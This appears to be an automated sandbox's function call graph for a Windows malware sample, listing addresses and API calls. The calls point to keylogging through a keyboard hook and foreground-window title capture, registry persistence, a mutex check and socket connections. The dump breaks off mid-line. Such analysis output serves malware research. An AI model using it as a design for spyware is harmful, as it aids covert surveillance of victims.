109377->109363 109379 1237678d RtlFreeHeap 109378->109379 109380 123767b6 _free 109378->109380 109379->109380 109381 123767a2 109379->109381 109380->109366 109386 123705dd 20 API calls __dosmaperr 109381->109386 109383 123767a8 GetLastError 109383->109380 109384->109375 109385->109373 109386->109383 109387->109344 109389 12366ea7 109388->109389 109389->109021 109389->109389 109391 1237f06b 109390->109391 109392 1237f062 109390->109392 109391->109025 109395 1237ef58 48 API calls 4 library calls 109392->109395 109394->109025 109395->109391 109397 1234cb8f LoadLibraryA GetProcAddress 109396->109397 109398 1234cb7f GetModuleHandleA GetProcAddress 109396->109398 109399 1234cbb8 44 API calls 109397->109399 109400 1234cba8 LoadLibraryA GetProcAddress 
109397->109400 109398->109397 109399->109030 109400->109399 109816 1234b4a8 FindResourceA 109401->109816 109405 1233f3ed _Yarn 109826 123320b7 109405->109826 109408 12331fe2 28 API calls 109409 1233f413 109408->109409 109410 12331fd8 11 API calls 109409->109410 109411 1233f41c 109410->109411 109412 1236bd51 _Yarn 21 API calls 109411->109412 109413 1233f42d _Yarn 109412->109413 109832 12336dd8 109413->109832 109415 1233f460 109415->109032 109417 1233210c 109416->109417 109418 123323ce 11 API calls 109417->109418 109419 12332126 109418->109419 109420 12332569 28 API calls 109419->109420 109421 12332134 109420->109421 109421->109035 109896 123320df 109422->109896 109424 1234be9e 109425 12331fd8 11 API calls 109424->109425 109426 1234bed0 109425->109426 109427 12331fd8 11 API calls 109426->109427 109429 1234bed8 109427->109429 109428 1234bea0 109430 123341a2 28 API calls 109428->109430 109432 12331fd8 11 API calls 109429->109432 109433 1234beac 109430->109433 109434 1233ea24 109432->109434 109435 12331fe2 28 API calls 109433->109435 109444 1233fb17 109434->109444 109437 1234beb5 109435->109437 109436 12331fe2 28 API calls 109443 1234be2e 109436->109443 109438 12331fd8 11 API calls 109437->109438 109440 1234bebd 109438->109440 109439 12331fd8 11 API calls 109439->109443 109441 1234ce34 28 API calls 109440->109441 109441->109424 109443->109424 109443->109428 109443->109436 109443->109439 109900 123341a2 109443->109900 109903 1234ce34 109443->109903 109445 1233fb23 109444->109445 109447 1233fb2a 109444->109447 109934 12332163 11 API calls 109445->109934 109447->109040 109449 12332163 109448->109449 109453 1233219f 109449->109453 109935 12332730 11 API calls 109449->109935 109451 12332184 109936 12332712 11 API calls std::_Deallocate 109451->109936 109453->109042 109455 12331e6d 109454->109455 109456 12331e75 109455->109456 109937 12332158 22 API calls 109455->109937 109456->109047 109460 123320df 11 API calls 109459->109460 109461 1233532a 109460->109461 109938 123332a0 
109461->109938 109463 12335346 109463->109055 109942 123351ef 109464->109942 109466 12336391 109946 12332055 109466->109946 109469 12331fe2 109470 12331ff1 109469->109470 109471 12332039 109469->109471 109472 123323ce 11 API calls 109470->109472 109478 12331fd8 109471->109478 109473 12331ffa 109472->109473 109474 1233203c 109473->109474 109476 12332015 109473->109476 109475 1233267a 11 API calls 109474->109475 109475->109471 109978 12333098 28 API calls 109476->109978 109479 123323ce 11 API calls 109478->109479 109480 12331fe1 109479->109480 109480->109067 109482 12331fd2 109481->109482 109483 12331fc9 109481->109483 109482->109073 109979 123325e0 28 API calls 109483->109979 109980 12331fab 109485->109980 109487 1233d073 CreateMutexA GetLastError 109487->109089 109981 1234bfb7 109488->109981 109493 12331fe2 28 API calls 109494 1234b2ff 109493->109494 109495 12331fd8 11 API calls 109494->109495 109496 1234b307 109495->109496 109497 1234b35d 109496->109497 109498 123435a6 31 API calls 109496->109498 109497->109096 109499 1234b330 109498->109499 109500 1234b33b StrToIntA 109499->109500 109501 1234b352 109500->109501 109502 1234b349 109500->109502 109504 12331fd8 11 API calls 109501->109504 109990 1234cf69 22 API calls 109502->109990 109504->109497 109506 1233772a 109505->109506 109507 12343549 3 API calls 109506->109507 109508 12337731 109507->109508 109508->109106 109508->109107 109510 1234bc72 109509->109510 109991 1233b904 109510->109991 109512 1234bc7a 109512->109123 109514 12331f22 109513->109514 109515 12331f6a 109513->109515 109516 12332252 11 API calls 109514->109516 109522 12331f09 109515->109522 109517 12331f2b 109516->109517 109518 12331f6d 109517->109518 109519 12331f46 109517->109519 110030 12332336 109518->110030 110029 1233305c 28 API calls 109519->110029 109523 12332252 11 API calls 109522->109523 109524 12331f12 109523->109524 109524->109135 109526 12343965 109525->109526 109527 12336dd8 28 API calls 109526->109527 109528 1234397a 109527->109528 
109529 123320f6 28 API calls 109528->109529 109530 1234398a 109529->109530 109531 1234376f 14 API calls 109530->109531 109532 12343994 109531->109532 109533 12331fd8 11 API calls 109532->109533 109534 123439a1 109533->109534 109534->109184 109536 1233209b 109535->109536 109537 123323ce 11 API calls 109536->109537 109538 123320a6 109537->109538 110034 123324ed 109538->110034 109542 123437bf 109541->109542 109545 12343788 109541->109545 109543 12331fd8 11 API calls 109542->109543 109544 1233ef9e 109543->109544 109544->109186 109546 1234379a RegSetValueExA RegCloseKey 109545->109546 109546->109542 109548 1236bac5 _strftime 109547->109548 110038 1236ae03 109548->110038 109550 1233efb7 109550->109193 109550->109195 109552 1234b505 GetLocalTime 109551->109552 109553 1234b5a0 109551->109553 109554 1233531e 28 API calls 109552->109554 109555 12331fd8 11 API calls 109553->109555 109556 1234b547 109554->109556 109557 1234b5a8 109555->109557 109559 12336383 28 API calls 109556->109559 109558 12331fd8 11 API calls 109557->109558 109560 1233f00d 109558->109560 109561 1234b553 109559->109561 109560->109210 110066 12332f10 109561->110066 109564 12336383 28 API calls 109565 1234b56b 109564->109565 110071 12337200 76 API calls 109565->110071 109567 1234b579 109568 12331fd8 11 API calls 109567->109568 109569 1234b585 109568->109569 109570 12331fd8 11 API calls 109569->109570 109571 1234b58e 109570->109571 109572 12331fd8 11 API calls 109571->109572 109573 1234b597 109572->109573 109574 12331fd8 11 API calls 109573->109574 109574->109553 109576 12339e02 _wcslen 109575->109576 109577 12339e24 109576->109577 109578 12339e0d 109576->109578 109579 1233da34 32 API calls 109577->109579 109580 1233da34 32 API calls 109578->109580 109581 12339e2c 109579->109581 109582 12339e15 109580->109582 109583 12331f13 28 API calls 109581->109583 109584 12331f13 28 API calls 109582->109584 109585 12339e3a 109583->109585 109587 12339e1f 109584->109587 109586 12331f09 11 API calls 109585->109586 109588 
12339e42 109586->109588 109589 12331f09 11 API calls 109587->109589 110090 1233915b 28 API calls 109588->110090 109590 12339e79 109589->109590 110075 1233a109 109590->110075 109593 12339e54 110091 12333014 109593->110091 109597 12331f13 28 API calls 109598 12339e69 109597->109598 109599 12331f09 11 API calls 109598->109599 109599->109587 110316 1233417e 109600->110316 109605 12333014 28 API calls 109606 1234b672 109605->109606 109607 12331f09 11 API calls 109606->109607 109608 1234b67b 109607->109608 109609 12331f09 11 API calls 109608->109609 109610 1233f223 109609->109610 109610->109263 109612 12343520 RegQueryValueExA RegCloseKey 109611->109612 109613 1233f2e4 109611->109613 109612->109613 109613->109136 109613->109291 109615 12343a3f RegDeleteValueW 109614->109615 109616 1233f392 109614->109616 109615->109616 109616->109128 109618 1233dd5b 109617->109618 109619 123434ff 3 API calls 109618->109619 109620 1233dd62 109619->109620 109621 1233dd81 109620->109621 110408 12331707 109620->110408 109625 12344f2a 109621->109625 109623 1233dd6f 110411 12343877 RegCreateKeyA 109623->110411 109626 123320df 11 API calls 109625->109626 109627 12344f3e 109626->109627 110425 1234b8b3 109627->110425 109630 123320df 11 API calls 109631 12344f54 109630->109631 109632 12331e65 22 API calls 109631->109632 109633 12344f62 109632->109633 109634 1236baac _strftime 39 API calls 109633->109634 109635 12344f6f 109634->109635 109636 12344f74 Sleep 109635->109636 109637 12344f81 109635->109637 109636->109637 109638 12332093 28 API calls 109637->109638 109639 12344f90 109638->109639 109640 12331e65 22 API calls 109639->109640 109641 12344f99 109640->109641 109642 123320f6 28 API calls 109641->109642 109643 12344fa4 109642->109643 109644 1234be1b 28 API calls 109643->109644 109645 12344fac 109644->109645 110429 1233489e WSAStartup 109645->110429 109647 12344fb6 109648 12331e65 22 API calls 109647->109648 109649 12344fbf 109648->109649 109650 12331e65 22 API calls 109649->109650 109675 
1234503e 109649->109675 109651 12344fd8 109650->109651 109652 12331e65 22 API calls 109651->109652 109653 12344fe9 109652->109653 109656 12331e65 22 API calls 109653->109656 109654 1234be1b 28 API calls 109654->109675 109655 12331e65 22 API calls 109655->109675 109657 12344ffa 109656->109657 109659 12331e65 22 API calls 109657->109659 109658 12336c1e 28 API calls 109658->109675 109660 1234500b 109659->109660 109662 12331e65 22 API calls 109660->109662 109661 12331fe2 28 API calls 109661->109675 109663 1234501c 109662->109663 109664 12331e65 22 API calls 109663->109664 109665 1234502e 109664->109665 110579 1233473d 88 API calls 109665->110579 109667 12332093 28 API calls 109667->109675 109668 1234b4ef 79 API calls 109668->109675 109670 1234518c WSAGetLastError 110580 1234cae1 30 API calls 109670->110580 109675->109654 109675->109655 109675->109658 109675->109661 109675->109667 109675->109668 109675->109670 109678 1233531e 28 API calls 109675->109678 109680 12331e8d 11 API calls 109675->109680 109681 12345a33 109675->109681 109683 12336383 28 API calls 109675->109683 109687 1233905c 28 API calls 109675->109687 109688 12371e81 20 API calls 109675->109688 109689 123320f6 28 API calls 109675->109689 109690 123436f8 3 API calls 109675->109690 109691 123435a6 31 API calls 109675->109691 109692 1233417e 28 API calls 109675->109692 109695 12331e65 22 API calls 109675->109695 109699 1234bb8e 28 API calls 109675->109699 109701 1234bd1e 28 API calls 109675->109701 109704 12332f10 28 API calls 109675->109704 109705 12332ea1 28 API calls 109675->109705 109707 12331fd8 11 API calls 109675->109707 109708 12331f09 11 API calls 109675->109708 109711 12345a71 CreateThread 109675->109711 110430 12344ee9 109675->110430 110435 1233482d 109675->110435 110442 12334f51 109675->110442 110457 123348c8 connect 109675->110457 110517 1234b7e0 109675->110517 110520 123445bd 109675->110520 110523 1233dd89 109675->110523 110529 1234bc42 109675->110529 110532 1234bae6 GetLastInputInfo GetTickCount 
109675->110532 110533 1234ba96 109675->110533 110538 1233f8d1 GetLocaleInfoA 109675->110538 110541 12332f31 109675->110541 110546 12334aa1 109675->110546 110561 12334c10 109675->110561 110581 123352fd 28 API calls 109675->110581 110583 12334e26 WaitForSingleObject 109675->110583 109678->109675 109679 12331e65 22 API calls 109679->109681 109680->109675 109681->109679 109682 1236baac _strftime 39 API calls 109681->109682 110582 1233b051 84 API calls 109681->110582 109684 12345acf Sleep 109682->109684 109683->109675 109684->109675 109687->109675 109688->109675 109689->109675 109690->109675 109691->109675 109692->109675 109696 12345439 GetTickCount 109695->109696 109697 1234bb8e 28 API calls 109696->109697 109697->109675 109699->109675 109701->109675 109704->109675 109705->109675 109707->109675 109708->109675 109711->109675 111083 1234ad17 105 API calls 109711->111083 109712->109048 109713->109056 109714->109060 109717 123320df 11 API calls 109716->109717 109718 12336c2a 109717->109718 109719 123332a0 28 API calls 109718->109719 109720 12336c47 109719->109720 109720->109081 109722 1233eba4 109721->109722 109723 12343573 RegQueryValueExA RegCloseKey 109721->109723 109722->109078 109722->109095 109723->109722 109724->109084 109725->109114 109726->109107 109727->109099 109728->109112 109730 12331f86 11 API calls 109729->109730 109731 1233da50 109730->109731 109732 1233da70 109731->109732 109733 1233daa5 109731->109733 109734 1233da66 109731->109734 111099 1234b5b4 29 API calls 109732->111099 109737 1234bfb7 2 API calls 109733->109737 109736 1233db99 GetLongPathNameW 109734->109736 109739 1233417e 28 API calls 109736->109739 109740 1233daaa 109737->109740 109738 1233da79 109741 12331f13 28 API calls 109738->109741 109742 1233dbae 109739->109742 109743 1233db00 109740->109743 109744 1233daae 109740->109744 109745 1233da83 109741->109745 109746 1233417e 28 API calls 109742->109746 109747 1233417e 28 API calls 109743->109747 109748 1233417e 28 API calls 109744->109748 109752 
12331f09 11 API calls 109745->109752 109749 1233dbbd 109746->109749 109750 1233db0e 109747->109750 109751 1233dabc 109748->109751 111084 1233ddd1 109749->111084 109755 1233417e 28 API calls 109750->109755 109756 1233417e 28 API calls 109751->109756 109752->109734 109759 1233db24 109755->109759 109760 1233dad2 109756->109760 109762 12332fa5 28 API calls 109759->109762 109763 12332fa5 28 API calls 109760->109763 109761 12332fa5 28 API calls 109764 1233dbe5 109761->109764 109765 1233db2f 109762->109765 109766 1233dadd 109763->109766 109767 12331f09 11 API calls 109764->109767 109768 12331f13 28 API calls 109765->109768 109769 12331f13 28 API calls 109766->109769 109770 1233dbef 109767->109770 109771 1233db3a 109768->109771 109772 1233dae8 109769->109772 109773 12331f09 11 API calls 109770->109773 109774 12331f09 11 API calls 109771->109774 109775 12331f09 11 API calls 109772->109775 109776 1233dbf8 109773->109776 109777 1233db43 109774->109777 109778 1233daf1 109775->109778 109779 12331f09 11 API calls 109776->109779 109780 12331f09 11 API calls 109777->109780 109781 12331f09 11 API calls 109778->109781 109782 1233dc01 109779->109782 109780->109745 109781->109745 109783 12331f09 11 API calls 109782->109783 109784 1233dc0a 109783->109784 109785 12331f09 11 API calls 109784->109785 109786 1233dc13 109785->109786 109786->109172 109787->109185 109788->109206 109790 1234371e RegQueryValueExA RegCloseKey 109789->109790 109791 12343742 109789->109791 109790->109791 109791->109165 109792->109200 109795 123644ef 109793->109795 109794 1236bd51 _Yarn 21 API calls 109794->109795 109795->109794 109796 1233f0d1 109795->109796 111104 12372f80 7 API calls 2 library calls 109795->111104 111105 12364c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 109795->111105 111106 1236526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 109795->111106 109796->109237 109801 12332093 28 API calls 109800->109801 109802 1233d9ff 109801->109802 109803 
1234bc5e 28 API calls 109802->109803 109804 1233da0a 109803->109804 109805 1233da34 32 API calls 109804->109805 109806 1233da1b 109805->109806 109807 12331f09 11 API calls 109806->109807 109808 1233da24 109807->109808 109809 12331fd8 11 API calls 109808->109809 109810 1233da2c 109809->109810 109810->109269 109811->109256 109813->109300 109814->109105 109817 1234b4c5 LoadResource LockResource SizeofResource 109816->109817 109818 1233f3de 109816->109818 109817->109818 109819 1236bd51 109818->109819 109824 12376137 __Getctype 109819->109824 109820 12376175 109836 123705dd 20 API calls __dosmaperr 109820->109836 109821 12376160 RtlAllocateHeap 109823 12376173 109821->109823 109821->109824 109823->109405 109824->109820 109824->109821 109835 12372f80 7 API calls 2 library calls 109824->109835 109827 123320bf 109826->109827 109837 123323ce 109827->109837 109829 123320ca 109841 1233250a 109829->109841 109831 123320d9 109831->109408 109833 123320b7 28 API calls 109832->109833 109834 12336dec 109833->109834 109834->109415 109835->109824 109836->109823 109838 12332428 109837->109838 109839 123323d8 109837->109839 109838->109829 109839->109838 109848 123327a7 109839->109848 109842 1233251a 109841->109842 109843 12332520 109842->109843 109844 12332535 109842->109844 109859 12332569 109843->109859 109869 123328e8 109844->109869 109847 12332533 109847->109831 109849 12332e21 109848->109849 109852 123316b4 109849->109852 109851 12332e30 109851->109838 109853 123316c6 109852->109853 109854 123316cb 109852->109854 109858 1236bd19 11 API calls _Atexit 109853->109858 109854->109853 109855 123316f3 109854->109855 109855->109851 109857 1236bd18 109858->109857 109880 12332888 109859->109880 109861 1233257d 109862 12332592 109861->109862 109863 123325a7 109861->109863 109885 12332a34 22 API calls 109862->109885 109864 123328e8 28 API calls 109863->109864 109868 123325a5 109864->109868 109866 1233259b 109886 123329da 22 API calls 109866->109886 109868->109847 109870 123328f1 109869->109870 
109871 12332953 109870->109871 109872 123328fb 109870->109872 109894 123328a4 22 API calls 109871->109894 109875 12332904 109872->109875 109877 12332917 109872->109877 109888 12332cae 109875->109888 109878 12332915 109877->109878 109879 123323ce 11 API calls 109877->109879 109878->109847 109879->109878 109881 12332890 109880->109881 109882 12332898 109881->109882 109887 12332ca3 22 API calls 109881->109887 109882->109861 109885->109866 109886->109868 109889 12332cb8 __EH_prolog 109888->109889 109895 12332e54 22 API calls 109889->109895 109891 123323ce 11 API calls 109893 12332d92 109891->109893 109892 12332d24 109892->109891 109893->109878 109895->109892 109897 123320e7 109896->109897 109898 123323ce 11 API calls 109897->109898 109899 123320f2 109898->109899 109899->109443 109914 1233423a 109900->109914 109904 1234ce41 109903->109904 109905 1234cea0 109904->109905 109909 1234ce51 109904->109909 109906 1234ceba 109905->109906 109925 1234cfe0 28 API calls 109905->109925 109908 1234d146 28 API calls 109906->109908 109911 1234ce9c 109908->109911 109910 1234ce89 109909->109910 109920 1234cfe0 28 API calls 109909->109920 109921 1234d146 109910->109921 109911->109443 109915 12334243 109914->109915 109916 123323ce 11 API calls 109915->109916 109917 1233424e 109916->109917 109918 12332569 28 API calls 109917->109918 109919 123341b5 109918->109919 109919->109443 109920->109910 109922 1234d14f 109921->109922 109926 1234d1f2 109922->109926 109925->109906 109927 1234d1fb 109926->109927 109930 1234d2a0 109927->109930 109932 1234d2ab 109930->109932 109931 1234d159 109931->109911 109932->109931 109933 123320f6 28 API calls 109932->109933 109933->109931 109934->109447 109935->109451 109936->109453 109940 123332aa 109938->109940 109939 123332c9 109939->109463 109940->109939 109941 123328e8 28 API calls 109940->109941 109941->109939 109943 123351fb 109942->109943 109952 12335274 109943->109952 109945 12335208 109945->109466 109947 12332061 109946->109947 109948 123323ce 11 API calls 
109947->109948 109949 1233207b 109948->109949 109974 1233267a 109949->109974 109953 12335282 109952->109953 109954 12335288 109953->109954 109955 1233529e 109953->109955 109963 123325f0 109954->109963 109956 123352b6 109955->109956 109957 123352f5 109955->109957 109961 123328e8 28 API calls 109956->109961 109962 1233529c 109956->109962 109972 123328a4 22 API calls 109957->109972 109961->109962 109962->109945 109964 12332888 22 API calls 109963->109964 109965 12332602 109964->109965 109966 12332672 109965->109966 109967 12332629 109965->109967 109973 123328a4 22 API calls 109966->109973 109969 123328e8 28 API calls 109967->109969 109971 1233263b 109967->109971 109969->109971 109971->109962 109975 1233268b 109974->109975 109976 123323ce 11 API calls 109975->109976 109977 1233208d 109976->109977 109977->109469 109978->109471 109979->109482 109982 1234bfc4 GetCurrentProcess IsWow64Process 109981->109982 109983 1234b2d1 109981->109983 109982->109983 109984 1234bfdb 109982->109984 109985 123435a6 RegOpenKeyExA 109983->109985 109984->109983 109986 123435d4 RegQueryValueExA RegCloseKey 109985->109986 109987 123435fe 109985->109987 109986->109987 109988 12332093 28 API calls 109987->109988 109989 12343613 109988->109989 109989->109493 109990->109501 109992 1233b90c 109991->109992 109997 12332252 109992->109997 109994 1233b917 110001 1233b92c 109994->110001 109996 1233b926 109996->109512 109998 1233225c 109997->109998 109999 123322ac 109997->109999 109998->109999 110008 12332779 11 API calls std::_Deallocate 109998->110008 109999->109994 110002 1233b966 110001->110002 110003 1233b938 110001->110003 110020 123328a4 22 API calls 110002->110020 110009 123327e6 110003->110009 110007 1233b942 110007->109996 110008->109999 110010 123327ef 110009->110010 110011 12332851 110010->110011 110012 123327f9 110010->110012 110027 123328a4 22 API calls 110011->110027 110015 12332802 110012->110015 110017 12332815 110012->110017 110021 12332aea 110015->110021 110018 12332813 110017->110018 
110019 12332252 11 API calls 110017->110019 110018->110007 110019->110018 110022 12332af4 __EH_prolog 110021->110022 110028 12332e45 22 API calls 110022->110028 110024 12332252 11 API calls 110026 12332bce 110024->110026 110025 12332b60 110025->110024 110026->110018 110028->110025 110029->109515 110031 12332347 110030->110031 110032 12332252 11 API calls 110031->110032 110033 123323c7 110032->110033 110033->109515 110035 123324f9 110034->110035 110036 1233250a 28 API calls 110035->110036 110037 123320b1 110036->110037 110037->109179 110054 1236ba0a 110038->110054 110040 1236ae50 110060 1236a7b7 35 API calls 2 library calls 110040->110060 110041 1236ae15 110041->110040 110042 1236ae2a 110041->110042 110053 1236ae2f __cftof 110041->110053 110059 123705dd 20 API calls __dosmaperr 110042->110059 110046 1236ae5c 110047 1236ae8b 110046->110047 110061 1236ba4f 39 API calls __Toupper 110046->110061 110048 1236aef7 110047->110048 110062 1236b9b6 20 API calls 2 library calls 110047->110062 110063 1236b9b6 20 API calls 2 library calls 110048->110063 110051 1236afbe _strftime 110051->110053 110064 123705dd 20 API calls __dosmaperr 110051->110064 110053->109550 110055 1236ba22 110054->110055 110056 1236ba0f 110054->110056 110055->110041 110065 123705dd 20 API calls __dosmaperr 110056->110065 110058 1236ba14 __cftof 110058->110041 110059->110053 110060->110046 110061->110046 110062->110048 110063->110051 110064->110053 110065->110058 110072 12331fb0 110066->110072 110068 12332f1e 110069 12332055 11 API calls 110068->110069 110070 12332f2d 110069->110070 110070->109564 110071->109567 110073 123325f0 28 API calls 110072->110073 110074 12331fbd 110073->110074 110074->110068 110076 1233a127 110075->110076 110077 12343549 3 API calls 110076->110077 110078 1233a12e 110077->110078 110079 1233a142 110078->110079 110080 1233a15c 110078->110080 110082 1233a147 110079->110082 110083 12339e9b 110079->110083 110096 1233905c 110080->110096 110085 1233905c 28 API calls 110082->110085 
110083->109229 110086 1233a155 110085->110086 110124 1233a22d 29 API calls 110086->110124 110089 1233a15a 110089->110083 110090->109593 110284 12333222 110091->110284 110093 12333022 110288 12333262 110093->110288 110097 12339072 110096->110097 110098 12332252 11 API calls 110097->110098 110099 1233908c 110098->110099 110125 12334267 110099->110125 110101 1233909a 110102 1233a179 110101->110102 110137 1233b8ec 110102->110137 110105 1233a1a2 110108 12332093 28 API calls 110105->110108 110106 1233a1ca 110107 12332093 28 API calls 110106->110107 110109 1233a1d5 110107->110109 110110 1233a1ac 110108->110110 110111 12332093 28 API calls 110109->110111 110112 1234bc5e 28 API calls 110110->110112 110113 1233a1e4 110111->110113 110114 1233a1ba 110112->110114 110116 1234b4ef 79 API calls 110113->110116 110141 1233b164 31 API calls _Yarn 110114->110141 110118 1233a1e9 CreateThread 110116->110118 110117 1233a1c1 110119 12331fd8 11 API calls 110117->110119 110120 1233a210 CreateThread 110118->110120 110121 1233a204 CreateThread 110118->110121 110149 1233a27d 110118->110149 110119->110106 110122 12331f09 11 API calls 110120->110122 110143 1233a289 110120->110143 110121->110120 110146 1233a267 110121->110146 110123 1233a224 110122->110123 110123->110083 110124->110089 110283 1233a273 163 API calls 110124->110283 110126 12332888 22 API calls 110125->110126 110127 1233427b 110126->110127 110128 12334290 110127->110128 110129 123342a5 110127->110129 110135 123342df 22 API calls 110128->110135 110131 123327e6 28 API calls 110129->110131 110134 123342a3 110131->110134 110132 12334299 110136 12332c48 22 API calls 110132->110136 110134->110101 110135->110132 110136->110134 110138 1233b8f5 110137->110138 110139 1233a197 110137->110139 110142 1233b96c 28 API calls 110138->110142 110139->110105 110139->110106 110141->110117 110142->110139 110152 1233acd6 110143->110152 110203 1233a2b8 110146->110203 110224 1233a726 110149->110224 110162 1233ace4 110152->110162 110153 1233a292 110154 
1233ad3e Sleep GetForegroundWindow GetWindowTextLengthW 110155 1233b904 28 API calls 110154->110155 110155->110162 110159 1234bae6 GetLastInputInfo GetTickCount 110159->110162 110161 1233ad84 GetWindowTextW 110161->110162 110162->110153 110162->110154 110162->110159 110162->110161 110164 12331f09 11 API calls 110162->110164 110165 1233aedc 110162->110165 110166 1233b8ec 28 API calls 110162->110166 110168 1233ae49 Sleep 110162->110168 110171 12332093 28 API calls 110162->110171 110172 1233add1 110162->110172 110176 12336383 28 API calls 110162->110176 110178 12333014 28 API calls 110162->110178 110179 1234bc5e 28 API calls 110162->110179 110180 1233a636 29 API calls 110162->110180 110181 12331fd8 11 API calls 110162->110181 110182 123643e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 110162->110182 110183 12331f86 110162->110183 110187 12364770 23 API calls __onexit 110162->110187 110188 123643a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 110162->110188 110189 12339044 28 API calls 110162->110189 110191 1233b97c 28 API calls 110162->110191 110192 1233b748 40 API calls 2 library calls 110162->110192 110193 12371e81 110162->110193 110197 123352fd 28 API calls 110162->110197 110164->110162 110167 12331f09 11 API calls 110165->110167 110166->110162 110167->110153 110168->110162 110171->110162 110172->110162 110174 1233905c 28 API calls 110172->110174 110190 1233b164 31 API calls _Yarn 110172->110190 110174->110172 110176->110162 110178->110162 110179->110162 110180->110162 110181->110162 110184 12331f8e 110183->110184 110185 12332252 11 API calls 110184->110185 110186 12331f99 110185->110186 110186->110162 110187->110162 110188->110162 110189->110162 110190->110172 110191->110162 110192->110162 110194 12371e8d 110193->110194 110198 12371c7d 110194->110198 110196 12371eae 110196->110162 110199 12371c94 110198->110199 110201 12371ccb __cftof 110199->110201 110202 123705dd 20 
API calls __dosmaperr 110199->110202 110201->110196 110202->110201 110204 1233a333 KiUserCallbackDispatcher 110203->110204 110205 1233a2d1 GetModuleHandleA SetWindowsHookExA 110203->110205 110206 1233a345 TranslateMessage DispatchMessageA 110204->110206 110208 1233a270 110204->110208 110205->110204 110207 1233a2ed GetLastError 110205->110207 110206->110204 110206->110208 110218 1234bb8e 110207->110218 110219 12371e81 20 API calls 110218->110219 110220 1234bbb2 110219->110220 110221 12332093 28 API calls 110220->110221 110222 1233a2fe 110221->110222 110223 123352fd 28 API calls 110222->110223 110225 1233a73b Sleep 110224->110225 110245 1233a675 110225->110245 110227 1233a286 110228 1233a77b CreateDirectoryW 110234 1233a74d 110228->110234 110229 1233a78c GetFileAttributesW 110229->110234 110230 1233a7a3 SetFileAttributesW 110230->110234 110231 123320df 11 API calls 110242 1233a7ee 110231->110242 110233 1233a81d PathFileExistsW 110233->110242 110234->110225 110234->110227 110234->110228 110234->110229 110234->110230 110235 12331e65 22 API calls 110234->110235 110234->110242 110258 1234c3f1 110234->110258 110235->110234 110237 123320b7 28 API calls 110237->110242 110238 1233a926 SetFileAttributesW 110238->110234 110239 12336dd8 28 API calls 110239->110242 110240 12331fe2 28 API calls 110240->110242 110242->110231 110242->110233 110242->110237 110242->110238 110242->110239 110242->110240 110243 12331fd8 11 API calls 110242->110243 110244 12331fd8 11 API calls 110242->110244 110268 1234c485 CreateFileW 110242->110268 110276 1234c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 110242->110276 110243->110242 110244->110234 110246 1233a722 110245->110246 110249 1233a68b 110245->110249 110246->110234 110247 1233a6aa CreateFileW 110248 1233a6b8 GetFileSize 110247->110248 110247->110249 110248->110249 110250 1233a6ed FindCloseChangeNotification 110248->110250 110249->110247 110249->110250 110251 1233a6ff 110249->110251 110252 1233a6e2 Sleep 
110249->110252 110253 1233a6db 110249->110253 110250->110249 110251->110246 110255 1233905c 28 API calls 110251->110255 110252->110250 110277 1233b0dc 83 API calls 110253->110277 110256 1233a71b 110255->110256 110257 1233a179 124 API calls 110256->110257 110257->110246 110259 1234c404 CreateFileW 110258->110259 110261 1234c441 110259->110261 110262 1234c43d 110259->110262 110263 1234c461 WriteFile 110261->110263 110264 1234c448 SetFilePointer 110261->110264 110262->110234 110266 1234c474 110263->110266 110267 1234c476 FindCloseChangeNotification 110263->110267 110264->110263 110265 1234c458 CloseHandle 110264->110265 110265->110262 110266->110267 110267->110262 110269 1234c4af GetFileSize 110268->110269 110270 1234c4ab 110268->110270 110278 1233244e 110269->110278 110270->110242 110272 1234c4c3 110273 1234c4d5 ReadFile 110272->110273 110274 1234c4e4 FindCloseChangeNotification 110273->110274 110275 1234c4e2 110273->110275 110274->110270 110275->110274 110276->110242 110277->110252 110279 12332456 110278->110279 110281 12332460 110279->110281 110282 12332a51 28 API calls 110279->110282 110281->110272 110282->110281 110285 1233322e 110284->110285 110294 12333618 110285->110294 110287 1233323b 110287->110093 110289 1233326e 110288->110289 110290 12332252 11 API calls 110289->110290 110291 12333288 110290->110291 110292 12332336 11 API calls 110291->110292 110293 12333031 110292->110293 110293->109597 110295 12333626 110294->110295 110296 1233362c 110295->110296 110297 12333644 110295->110297 110305 123336a6 110296->110305 110299 1233369e 110297->110299 110300 1233365c 110297->110300 110314 123328a4 22 API calls 110299->110314 110303 123327e6 28 API calls 110300->110303 110304 12333642 110300->110304 110303->110304 110304->110287 110306 12332888 22 API calls 110305->110306 110307 123336b9 110306->110307 110308 123336de 110307->110308 110309 1233372c 110307->110309 110312 123327e6 28 API calls 110308->110312 110313 123336f0 110308->110313 110315 123328a4 22 API calls 
110309->110315 110312->110313 110313->110304 110317 12334186 110316->110317 110318 12332252 11 API calls 110317->110318 110319 12334191 110318->110319 110327 123341bc 110319->110327 110322 123342fc 110338 12334353 110322->110338 110324 1233430a 110325 12333262 11 API calls 110324->110325 110326 12334319 110325->110326 110326->109605 110328 123341c8 110327->110328 110331 123341d9 110328->110331 110330 1233419c 110330->110322 110332 123341e9 110331->110332 110333 12334206 110332->110333 110334 123341ef 110332->110334 110335 123327e6 28 API calls 110333->110335 110336 12334267 28 API calls 110334->110336 110337 12334204 110335->110337 110336->110337 110337->110330 110339 1233435f 110338->110339 110342 12334371 110339->110342 110341 1233436d 110341->110324 110343 1233437f 110342->110343 110344 12334385 110343->110344 110345 1233439e 110343->110345 110406 123334e6 28 API calls 110344->110406 110346 12332888 22 API calls 110345->110346 110347 123343a6 110346->110347 110349 12334419 110347->110349 110350 123343bf 110347->110350 110407 123328a4 22 API calls 110349->110407 110352 123327e6 28 API calls 110350->110352 110361 1233439c 110350->110361 110352->110361 110361->110341 110406->110361 110414 1236aa9a 110408->110414 110412 1234388f RegSetValueExA RegCloseKey 110411->110412 110413 123438b9 110411->110413 110412->110413 110413->109621 110417 1236aa1b 110414->110417 110416 1233170d 110416->109623 110418 1236aa3e 110417->110418 110419 1236aa2a 110417->110419 110422 1236aa2f __alldvrm __cftof 110418->110422 110424 12378957 11 API calls 2 library calls 110418->110424 110423 123705dd 20 API calls __dosmaperr 110419->110423 110422->110416 110423->110422 110424->110422 110427 1234b8f9 _Yarn ___scrt_get_show_window_mode 110425->110427 110426 12332093 28 API calls 110428 12344f49 110426->110428 110427->110426 110428->109630 110429->109647 110431 12344f02 getaddrinfo WSASetLastError 110430->110431 110432 12344ef8 